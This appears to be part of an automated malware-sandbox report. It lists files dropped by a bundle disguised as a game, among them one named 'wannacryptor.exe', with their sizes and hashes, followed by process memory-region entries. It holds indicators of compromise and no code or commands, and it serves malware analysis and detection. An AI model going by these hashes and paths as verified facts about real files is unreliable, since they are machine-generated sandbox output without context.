                                                                                                                        908149a6f5238fcccd86f7c374986d486590a0991ef5243f0cd9e63cc8e208158a9a812665233b09c3a478233d30f21e3d355b94f36b83644795556f147345bf

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\reg.reg

                                                                                                                        Filesize

                                                                                                                        25KB

                                                                                                                        MD5

                                                                                                                        aebe09cd7095ec201dc8acc350443242

                                                                                                                        SHA1

                                                                                                                        df7337e051bd02e1fdd4005b63ed45b8ca3d9726

                                                                                                                        SHA256

                                                                                                                        405d47dca73a5d6180db42e90c35931047c666ed1f1d6fab5ead6110c2356cc7

                                                                                                                        SHA512

                                                                                                                        ffc658faf04fee47c1284d439a4c5b3931d2f9bcac9b40e36f59ad0ed4917f0252e639284f817ca84a6da57552f8e0fdf96936987c3f5cf689a537e42b47288d

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\spam.bat

                                                                                                                        Filesize

                                                                                                                        158B

                                                                                                                        MD5

                                                                                                                        4af4ab45205580fecf659dd857522f6b

                                                                                                                        SHA1

                                                                                                                        78ec5ff7647ca56d8c8d72b4da551efa86e53675

                                                                                                                        SHA256

                                                                                                                        b997f3a0d79493418f3e9da03dd95aea6b45b8a8c454e8e7d1f06de3ad3e1111

                                                                                                                        SHA512

                                                                                                                        f77c7b4d034def85c363805fe625aefb4e461770418f9015d4d5241fb8d09707b9918d54e9b2cc35d06008097174cdda0bee9702466fe7e097014794fe4d77cb

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\walliant.exe

                                                                                                                        Filesize

                                                                                                                        5.0MB

                                                                                                                        MD5

                                                                                                                        929335d847f8265c0a8648dd6d593605

                                                                                                                        SHA1

                                                                                                                        0ff9acf1293ed8b313628269791d09e6413fca56

                                                                                                                        SHA256

                                                                                                                        6613acb18cb8bf501fba619f04f8298e5e633cb220c450212bbc9dd2bef9538d

                                                                                                                        SHA512

                                                                                                                        7c9a4d1bec430503cc355dc76955d341e001b06196d4b508cc35d64feb2e8ba30e824e7c3a11c27135d7d99801f45f62a5b558563b4c78f89f5d156a929063fd

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\win7recovery.exe

                                                                                                                        Filesize

                                                                                                                        467KB

                                                                                                                        MD5

                                                                                                                        ab65e866abc51f841465d19aba35fb14

                                                                                                                        SHA1

                                                                                                                        ec79f1f511a199291b0893bc866a788ceac19f6e

                                                                                                                        SHA256

                                                                                                                        2ac0ca4ffda10b1861dd4ae0c2f0131a6400214cb4f5fa33951f3062b784a755

                                                                                                                        SHA512

                                                                                                                        2474905f174635b236e5f6e8f8c497e44435c94edd02ec47d3440c9a216f6840d040e6acc5fe2ec301ada80467f6cf55225d6361c1e7c6c6c7edccb9e7b5a35e

                                                                                                                      • C:\Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\wtf.PNG

                                                                                                                        Filesize

                                                                                                                        165KB

                                                                                                                        MD5

                                                                                                                        32073febd7354a8826b39f498bafd798

                                                                                                                        SHA1

                                                                                                                        9bb46e97ffe1070926948c3f567e6842e7787c3e

                                                                                                                        SHA256

                                                                                                                        f04378e355e197709c8991fc6412be1fc0bf9802a3ce98b892afac2e9e694812

                                                                                                                        SHA512

                                                                                                                        762c19b6de30d84e00f466bf270909798bde8e48d1e945023b005dacea5555324d07b2cf3714b0ad83a75653d09a8f9f7a1c643cb9e014cab95fc2b220c8fe95

                                                                                                                      • C:\Users\Default\Desktop\@[email protected]

                                                                                                                        Filesize

                                                                                                                        1.4MB

                                                                                                                        MD5

                                                                                                                        738183a3c734d0cd684c6cdb9252621c

                                                                                                                        SHA1

                                                                                                                        7247685b29b3c82843d15099b9e6f1815387bf0b

                                                                                                                        SHA256

                                                                                                                        3727fceb677760ed01e3c48caf1abd6be296c8b46d6596fddcf2f421af2386a9

                                                                                                                        SHA512

                                                                                                                        918c0ec19434a6f969186525f65ba3332e52395f3541ee88b21a01aea8d67ed45a72b5f0bc891228a239c3d39031e19ae6c72195078d1f7abc35a4c54bcda9d3

                                                                                                                      • \??\PIPE\samr

                                                                                                                        MD5

                                                                                                                        d41d8cd98f00b204e9800998ecf8427e

                                                                                                                        SHA1

                                                                                                                        da39a3ee5e6b4b0d3255bfef95601890afd80709

                                                                                                                        SHA256

                                                                                                                        e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855

                                                                                                                        SHA512

                                                                                                                        cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e

                                                                                                                      • \Users\Admin\AppData\Local\Temp\is-DV8I8.tmp\walliant.tmp

                                                                                                                        Filesize

                                                                                                                        2.5MB

                                                                                                                        MD5

                                                                                                                        62e5dbc52010c304c82ada0ac564eff9

                                                                                                                        SHA1

                                                                                                                        d911cb02fdaf79e7c35b863699d21ee7a0514116

                                                                                                                        SHA256

                                                                                                                        bd54ad7a25594dc823572d9b23a3490ff6b8b1742a75e368d110421ab08909b2

                                                                                                                        SHA512

                                                                                                                        b5d863ea38816c18f7778ef12ea4168ceb0dae67704c0d1d4a60b0237ca6e758c1dfc5c28d4fc9679b0159de25e56d5dfff8addacd7a9c52572674d90c424946

                                                                                                                      • \Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\AxInterop.ShockwaveFlashObjects.dll

                                                                                                                        Filesize

                                                                                                                        17KB

                                                                                                                        MD5

                                                                                                                        451112d955af4fe3c0d00f303d811d20

                                                                                                                        SHA1

                                                                                                                        1619c35078ba891091de6444099a69ef364e0c10

                                                                                                                        SHA256

                                                                                                                        0d57a706d4e10cca3aed49b341a651f29046f5ef1328878d616be93c3b4cbce9

                                                                                                                        SHA512

                                                                                                                        35357d2c4b8229ef9927fa37d85e22f3ae26606f577c4c4655b2126f0ecea4c69dae03043927207ca426cc3cd54fc3e72124369418932e04733a368c9316cf87

                                                                                                                      • \Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\calc.exe

                                                                                                                        Filesize

                                                                                                                        112KB

                                                                                                                        MD5

                                                                                                                        829e4805b0e12b383ee09abdc9e2dc3c

                                                                                                                        SHA1

                                                                                                                        5a272b7441328e09704b6d7eabdbd51b8858fde4

                                                                                                                        SHA256

                                                                                                                        37121ecb7c1e112b735bd21b0dfe3e526352ecb98c434c5f40e6a2a582380cdd

                                                                                                                        SHA512

                                                                                                                        356fe701e6788c9e4988ee5338c09170311c2013d6b72d7756b7ada5cda44114945f964668feb440d262fb1c0f9ca180549aafd532d169ceeadf435b9899c8f6

                                                                                                                      • \Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\screenscrew.exe

                                                                                                                        Filesize

                                                                                                                        111KB

                                                                                                                        MD5

                                                                                                                        e87a04c270f98bb6b5677cc789d1ad1d

                                                                                                                        SHA1

                                                                                                                        8c14cb338e23d4a82f6310d13b36729e543ff0ca

                                                                                                                        SHA256

                                                                                                                        e03520794f00fb39ef3cfff012f72a5d03c60f89de28dbe69016f6ed151b5338

                                                                                                                        SHA512

                                                                                                                        8784f4d42908e54ecedfb06b254992c63920f43a27903ccedd336daaeed346db44e1f40e7db971735da707b5b32206be1b1571bc0d6a2d6eb90bbf9d1f69de13

                                                                                                                      • \Users\Admin\Desktop\yfga_game_dcd76740-bd0c-4f03-9cd6-cfe0538b65cd\wannacryptor.exe

                                                                                                                        Filesize

                                                                                                                        3.4MB

                                                                                                                        MD5

                                                                                                                        84c82835a5d21bbcf75a61706d8ab549

                                                                                                                        SHA1

                                                                                                                        5ff465afaabcbf0150d1a3ab2c2e74f3a4426467

                                                                                                                        SHA256

                                                                                                                        ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa

                                                                                                                        SHA512

                                                                                                                        90723a50c20ba3643d625595fd6be8dcf88d70ff7f4b4719a88f055d5b3149a4231018ea30d375171507a147e59f73478c0c27948590794554d031e7d54b7244

                                                                                                                      • memory/336-702-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        480KB

                                                                                                                      • memory/336-1782-0x0000000000600000-0x0000000000678000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        480KB

                                                                                                                      • memory/620-538-0x0000000000400000-0x00000000004A4000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        656KB

                                                                                                                      • memory/640-109-0x0000000001220000-0x0000000001292000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        456KB

                                                                                                                      • memory/640-116-0x00000000002D0000-0x00000000002DA000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        40KB

                                                                                                                      • memory/1096-537-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        296KB

                                                                                                                      • memory/1096-1793-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        296KB

                                                                                                                      • memory/1096-1755-0x0000000000400000-0x000000000044A000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        296KB

                                                                                                                      • memory/1232-1810-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.6MB

                                                                                                                      • memory/1232-540-0x0000000000400000-0x000000000068E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.6MB

                                                                                                                      • memory/1820-87-0x0000000000F50000-0x0000000000F60000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/2188-110-0x0000000002590000-0x0000000002690000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        1024KB

                                                                                                                      • memory/2188-111-0x0000000002590000-0x0000000002690000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        1024KB

                                                                                                                      • memory/2188-112-0x0000000002590000-0x0000000002690000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        1024KB

                                                                                                                      • memory/2244-74-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        864KB

                                                                                                                      • memory/2244-539-0x0000000000400000-0x00000000004D8000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        864KB

                                                                                                                      • memory/2344-782-0x0000000010000000-0x0000000010010000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        64KB

                                                                                                                      • memory/2528-3-0x0000000074BC0000-0x00000000752AE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2528-0-0x0000000074BCE000-0x0000000074BCF000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2528-704-0x0000000074BC0000-0x00000000752AE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2528-541-0x0000000074BCE000-0x0000000074BCF000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        4KB

                                                                                                                      • memory/2528-1790-0x0000000074BC0000-0x00000000752AE000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        6.9MB

                                                                                                                      • memory/2528-2-0x0000000000270000-0x0000000000294000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        144KB

                                                                                                                      • memory/2528-1-0x0000000000960000-0x00000000009EC000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        560KB

                                                                                                                      • memory/2704-1776-0x000000006FA20000-0x000000006FC3C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.1MB

                                                                                                                      • memory/2704-1779-0x0000000000080000-0x000000000037E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        3.0MB

                                                                                                                      • memory/2704-1777-0x000000006FD10000-0x000000006FD92000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        520KB

                                                                                                                      • memory/2704-1778-0x0000000070450000-0x0000000070472000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        136KB

                                                                                                                      • memory/2704-1802-0x000000006FD10000-0x000000006FD92000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        520KB

                                                                                                                      • memory/2704-1803-0x0000000070450000-0x0000000070472000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        136KB

                                                                                                                      • memory/2704-1801-0x000000006FA20000-0x000000006FC3C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        2.1MB

                                                                                                                      • memory/2704-1800-0x000000006FF20000-0x000000006FF97000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        476KB

                                                                                                                      • memory/2704-1799-0x0000000074360000-0x000000007437C000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        112KB

                                                                                                                      • memory/2704-1797-0x0000000000080000-0x000000000037E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        3.0MB

                                                                                                                      • memory/2704-1798-0x000000006FFA0000-0x0000000070022000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        520KB

                                                                                                                      • memory/2704-1775-0x000000006FFA0000-0x0000000070022000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        520KB

                                                                                                                      • memory/2704-1811-0x0000000000080000-0x000000000037E000-memory.dmp

                                                                                                                        Filesize

                                                                                                                        3.0MB